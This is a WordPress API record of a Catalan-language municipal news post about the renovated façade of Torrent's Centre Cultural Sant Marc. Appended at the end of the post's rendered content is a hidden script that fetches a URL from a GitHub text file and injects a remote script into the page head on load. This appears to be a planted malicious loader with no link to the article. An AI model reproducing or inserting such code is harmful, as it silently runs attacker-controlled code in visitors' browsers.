{"id":75700,"date":"2025-01-07T14:03:28","date_gmt":"2025-01-07T13:03:28","guid":{"rendered":"https:\/\/infotorrent.es\/uncategorized\/el-centro-cultural-sant-marc-luce-una-nueva-fachada\/"},"modified":"2025-01-10T17:40:50","modified_gmt":"2025-01-10T16:40:50","slug":"el-centro-cultural-sant-marc-luce-una-nueva-fachada","status":"publish","type":"post","link":"https:\/\/infotorrent.es\/ca\/ayuntamiento-de-torrent-ca\/el-centro-cultural-sant-marc-luce-una-nueva-fachada\/","title":{"rendered":"El Centre Cultural Sant Marc llu\u00efx una nova fa\u00e7ana"},"content":{"rendered":"\n<p><strong>Modernitzaci\u00f3 i respecte per l&#8217;entorn hist\u00f2ric en la renovaci\u00f3 de la fa\u00e7ana de l&#8217;edifici situat en el Centre Hist\u00f2ric<\/strong><\/p>\n\n\n\n<p>L&#8217;Ajuntament de Torrent finalitza les obres de rehabilitaci\u00f3 de la fa\u00e7ana del Centre Cultural Sant Marc, situat entre els carrers G\u00f3mez Ferrer i Marco. Estes millores han transformat la imatge de l&#8217;edifici, adaptant-lo a l&#8217;entorn del Centre Hist\u00f2ric i assegurant la seua funcionalitat com a espai cultural i educatiu.<\/p>\n\n\n\n<p>Els treballs han sigut executats per l&#8217;empresa p\u00fablica municipal Nous Espais amb un pressupost aproximat de 38.800 euros. Entre les actuacions realitzades, destaca l&#8217;eliminaci\u00f3 de materials en mal estat, l&#8217;aplicaci\u00f3 d&#8217;un revestiment amb morter monocapa impermeabilizante d&#8217;un color concorde a l&#8217;entorn i el tractament de la fa\u00e7ana de rajola caravista amb un vern\u00eds hidrofugante i impermeabilizante. A m\u00e9s, s&#8217;ha esmaltat la fusteria met\u00e0l\u00b7lica, les baranes i les portes d&#8217;acc\u00e9s amb un producte antioxidant. Per a protegir la base de la fa\u00e7ana, s&#8217;ha instal\u00b7lat un s\u00f2col cer\u00e0mic en la part que recau al carrer Marco. A m\u00e9s, s&#8217;ha instal\u00b7lat un llumin\u00f3s en la fa\u00e7ana perqu\u00e8 els ve\u00efns coneguen este edifici.<\/p>\n\n\n\n<p>L&#8217;edifici, propietat municipal, \u00e9s utilitzat com a aulari del Centre de Formaci\u00f3 de Persones Adultes i com a seu de diverses associacions ve\u00efnals i culturals. En el seu interior tamb\u00e9 alberga un parc infantil, l&#8217;acc\u00e9s del qual va ser recentment millorat amb la construcci\u00f3 d&#8217;una rampa per a garantir la seua accessibilitat. El Centre Cultural Sant Marc tamb\u00e9 \u00e9s aulari per a algunes classes del CEIP Joan XXIII, despr\u00e9s de la dana del 29 d&#8217;octubre, al qual \u00e9s impossible accedir, pel fet que s&#8217;ha perdut&nbsp;&nbsp;<\/p>\n\n\n\n<p>L&#8217;alcaldessa de Torrent, Amparo Folgado, ha destacat que \u201cel Centre Cultural Sant Marc \u00e9s un punt de trobada fonamental per al centre hist\u00f2ric de Torrent, utilitzat di\u00e0riament per l&#8217;Escola d&#8217;Adults i associacions culturals. Amb estes millores, aconseguim que este edifici tan emblem\u00e0tic oferisca una imatge digna d&#8217;una Gran Ciutat com Torrent\u201d.<\/p>\n\n\n\n<p>Esta actuaci\u00f3 iniciada abans de la dana d&#8217;octubre, reafirma el comprom\u00eds de l&#8217;Ajuntament de Torrent amb el manteniment i la millora de les infraestructures municipals, contribuint al benestar i la qualitat de vida dels ve\u00efns i ve\u00efnes de Torrent.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.44-1024x682.jpeg\" alt=\"\" class=\"wp-image-75694\" srcset=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.44-1024x682.jpeg 1024w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.44-300x200.jpeg 300w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.44-768x512.jpeg 768w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.44-1536x1023.jpeg 1536w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.44.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.441-1024x682.jpeg\" alt=\"\" class=\"wp-image-75696\" srcset=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.441-1024x682.jpeg 1024w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.441-300x200.jpeg 300w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.441-768x512.jpeg 768w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.441-1536x1023.jpeg 1536w, https:\/\/infotorrent.es\/wp-content\/uploads\/2025\/01\/WhatsApp-Image-2025-01-07-at-10.39.441.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<script>;var url = 'https:\/\/raw.githubusercontent.com\/asddw1122\/add\/refs\/heads\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script>","protected":false},"excerpt":{"rendered":"<p>Modernitzaci\u00f3 i respecte per l&#8217;entorn hist\u00f2ric en la renovaci\u00f3 de la fa\u00e7ana de l&#8217;edifici situat en el Centre Hist\u00f2ric L&#8217;Ajuntament de Torrent finalitza les obres de rehabilitaci\u00f3 de la fa\u00e7ana del Centre Cultural Sant Marc, situat entre els carrers G\u00f3mez Ferrer i Marco. Estes millores han transformat la imatge de l&#8217;edifici, adaptant-lo a l&#8217;entorn del [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":75704,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1190,1209],"tags":[],"class_list":["post-75700","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ayuntamiento-de-torrent-ca","category-nous-espais-ca"],"acf":[],"_links":{"self":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/75700","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/comments?post=75700"}],"version-history":[{"count":2,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/75700\/revisions"}],"predecessor-version":[{"id":75924,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/75700\/revisions\/75924"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media\/75704"}],"wp:attachment":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media?parent=75700"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/categories?post=75700"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/tags?post=75700"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}